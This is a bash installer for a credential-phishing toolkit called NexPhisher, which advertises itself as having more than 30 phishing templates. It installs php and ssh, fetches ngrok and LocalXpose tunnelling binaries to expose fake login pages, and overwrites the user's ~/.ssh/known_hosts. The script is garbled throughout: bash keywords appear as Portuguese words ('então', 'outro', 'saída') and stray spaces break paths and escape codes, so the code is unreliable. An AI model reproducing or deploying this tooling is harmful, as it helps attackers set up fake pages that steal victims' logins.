#! / bin / bash

banner () {
Claro
printf  " \ e [0m \ n "
printf  " \ e [0m \ e [92m _ _ \ e [0m \ e [93m _____ _ _ _ \ e [0m \ n "
printf  " \ e [0m \ e [92m | \ | | \ e [0m \ e [93m | __ \ | | (_) | | \ e [0m \ n "
printf  " \ e [0m \ e [92m | \ | | _____ __ \ e [0m \ e [93m | | __) | | __ _ ___ | | __ ___ _ __ \ e [0m \ n "
printf  " \ e [0m \ e [92m |. | / _ \ \ / / \ e [0m \ e [93m | ___ / | _ \ | / __ | _ \ / _ \ __ | \ e [0m \ n "
printf  " \ e [0m \ e [92m | | \ | __ /> <\ e [0m \ e [93m | | | | | \ __ \ | | | | __ / | \ e [0m \ n "
printf  " \ e [0m \ e [92m | _ | \ _ | \ ___ / _ / \ _ \ \ e [0m \ e [93m | _ | | _ | | _ | _ | ___ / _ | | _ | \ ___ | _ | \ e [0m \ e [1; 44m [V 1.0] \ e [0m \ n "
printf  " \ e [0m \ n "
printf  " \ e [0m \ e [1; 41m Ferramenta avançada de phishing com mais de 30 modelos [BY: 3L-TECH] \ e [0m \ n "
printf  " \ e [0m \ n "
}
bandeira
printf  " \ e [0m \ n "
printf  " \ e [0m \ e [1; 91m [\ e [1; 97m ~ \ e [1; 91m] \ e [1; 93m Instalando Pacotes .... \ e [0m \ n "
printf  " \ e [0m \ n "
apt-get update
apt-get upgrade -y
apt-get -y install ssh
apt-get -y install curl
apt-get -y install php
apt-get -y install unzip
apt-get -y install openssh-server
printf  " \ e [0m \ n "
printf  " \ e [0m \ e [1; 91m [\ e [1; 97m ~ \ e [1; 91m] \ e [1; 93m Configurando o ambiente .... \ e [0m \ n "
if [[ -d .htr]] ;  então
printf  " "
outro
mkdir .htr
fi
if [[ -d logs]] ;  então
printf  " "
outro
logs mkdir
fi
if [[ -e Modules.zip]] ;  então
unzip -qq Modules.zip
rm Modules.zip
fi
if [[ -e .htr / ngrok]] ;  então
printf  " "
outro
arch = $ ( uname -a | grep -o ' arm '  | head -n1 )
arch2 = $ ( uname -a | grep -o ' Android '  | head -n1 )
if [[ $ arch  ==  * ' arm ' * ]] || [[ $ arch2  ==  * ' Android ' * ]] ; então
curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > / dev / null 2> & 1
if [[ -e ngrok-stable-linux-arm.zip]] ;  então
descompacte ngrok-stable-linux-arm.zip > / dev / null 2> & 1
mv ngrok .htr
rm -rf ngrok-stable-linux-arm.zip
chmod + x .htr / ngrok
outro
printf  " \ n \ e [1; 31m [\ e [0m \ e [1; 77m! \ e [0m \ e [1; 31m] \ e [0m \ e [1; 93m Erro \ e [1; 31m [\ e [0m \ e [1; 77m! \ e [0m \ e [1; 31m] \ e [0m \ e [1; 96m Instalar Ngrok manualmente. \ e [0m \ n "
saída 1
fi
outro
curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > / dev / null 2> & 1 
if [[ -e ngrok-stable-linux-386.zip]] ; então
descompacte ngrok-stable-linux-386.zip > / dev / null 2> & 1
mv ngrok .htr
rm -rf ngrok-stable-linux-386.zip
chmod + x .htr / ngrok
outro
printf  " \ n \ e [1; 31m [\ e [0m \ e [1; 77m! \ e [0m \ e [1; 31m] \ e [0m \ e [1; 93m Erro \ e [1; 31m [\ e [0m \ e [1; 77m! \ e [0m \ e [1; 31m] \ e [0m \ e [1; 96m Instalar Ngrok manualmente. \ e [0m \ n "
saída 1
fi
fi
fi
if [[ -e .htr / loclx]] ;  então
printf  " "
outro
archa = $ ( uname -a | grep -o ' arm '  | head -n1 )
arch2a = $ ( uname -a | grep -o ' Android '  | head -n1 )
if [[ $ archa  ==  * ' arm ' * ]] || [[ $ arch2a  ==  * ' Android ' * ]] ;  então
curl -LO https://lxpdownloads.sgp1.digitaloceanspaces.com/cli/loclx-linux-arm.zip > / dev / null 2> & 1
if [[ -e loclx-linux-arm.zip]] ;  então
descompacte loclx-linux-arm.zip > / dev / null 2> & 1
mv loclx .htr
rm -rf loclx-linux-arm.zip
chmod + x .htr / loclx
outro
printf  " \ n \ e [1; 31m [\ e [0m \ e [1; 77m! \ e [0m \ e [1; 31m] \ e [0m \ e [1; 93m Erro \ e [1; 31m [\ e [0m \ e [1; 77m! \ e [0m \ e [1; 31m] \ e [0m \ e [1; 96m Instalar LocalXpose manualmente. \ e [0m \ n "
saída 1
fi
outro
curl -LO https://lxpdownloads.sgp1.digitaloceanspaces.com/cli/loclx-linux-386.zip > / dev / null 2> & 1 
if [[ -e loclx-linux-386.zip]] ;  então
descompacte loclx-linux-386.zip > / dev / null 2> & 1
mv loclx .htr
rm -rf loclx-linux-386.zip
chmod + x .htr / loclx
outro
printf  " \ n \ e [1; 31m [\ e [0m \ e [1; 77m! \ e [0m \ e [1; 31m] \ e [0m \ e [1; 93m Erro \ e [1; 31m [\ e [0m \ e [1; 77m! \ e [0m \ e [1; 31m] \ e [0m \ e [1; 96m Instalar LocalXpose manualmente. \ e [0m \ n "
saída 1
fi
fi
fi
if [[ -d  ~ /.ssh]] ;  então
printf  " "
outro
mkdir ~ /.ssh
fi
chmod + x nexphisher
printf  "| 1 | SVjtt9mtL4P / 5lsqaielF1pJHvM = | 6QmJXxfPd9A5uUaFI1RV2H4brTs = ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lJnhW1oCXuAYV9IBdcJA + Vx7AHL5S / ZQvV2fhceOAPgO2kNQZla6xvUwoE4iw8lYu3zoE1KtieCU9yInWOVI6W / wFaT / ETH1tn55T2FVsK / zaxPiHZVJGLPPdEEid0vS2p1JDfc9onZ0pNSHLl1QusIOeMUyZ2bUMMLLgw46KOT9S3s / LmxgoJ3PocVUn5rVXz / Dng7Y8jYNe4IFrZOAUsi7hNBa + OYja6ceefpDvNDEJ1BdhbYfGolBdNA7f + FNl0kfaWru4Cblr843wBe2ckO / sNqgeAMXO / QH * SSgQxUXF2AgAw + TGp3yCIyYoOPvOgvcPsQziJLmDbUuQpnH \ n | 1 | PiraXMKgzzt9DdPRSLAtRvRad0Y = | 2W162QXfHJvKKZWIaRyZO6VFWJI = ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQC3lJnhW1oCXuAYV9IBdcJA + Vx7AHL5S / ZQvV2fhceOAPgO2kNQZla6xvUwoE4iw8lYu3zoE1KtieCU9yInWOVI6W / wFaT / ETH1tn55T2FVsK / zaxPiHZVJGLPPdEEid0vS2p1JDfc9onZ0pNSHLl1QusIOeMUyZ2bUMMLLgw46KOT9S3s / LmxgoJ3PocVUn5rVXz / Dng7Y8jYNe4IFrZOAUsi7hNBa + OYja6ceefpDvNDEJ1BdhbYfGolBdNA7f + FNl0kfaWru4Cblr843wBe2ckO / sNqgeAMXO / QH * SSgQxUXF2AgAw + TGp3yCIyYoOPvOgvcPsQziJLmDbUuQpnH \ n"  >  ~ /.ssh/known_hosts
printf  " \ e [0m \ n "
printf  " \ e [0m \ e [1; 91m [\ e [1; 97m ~ \ e [1; 91m] \ e [1; 93m Instalação concluída !! \ e [0m \ n "
printf  " \ e [0m \ n "
dormir 2
printf  " \ e [0m \ e [1; 91m [\ e [1; 97m ~ \ e [1; 91m] \ e [1; 93m Digite \ e [1; 96mbash nexphisher \ e [1; 93mpara executar o NEXPHISHER! ! \ e [0m \ n "
printf  " \ e [0m \ n "
printf  " \ e [0m \ n "
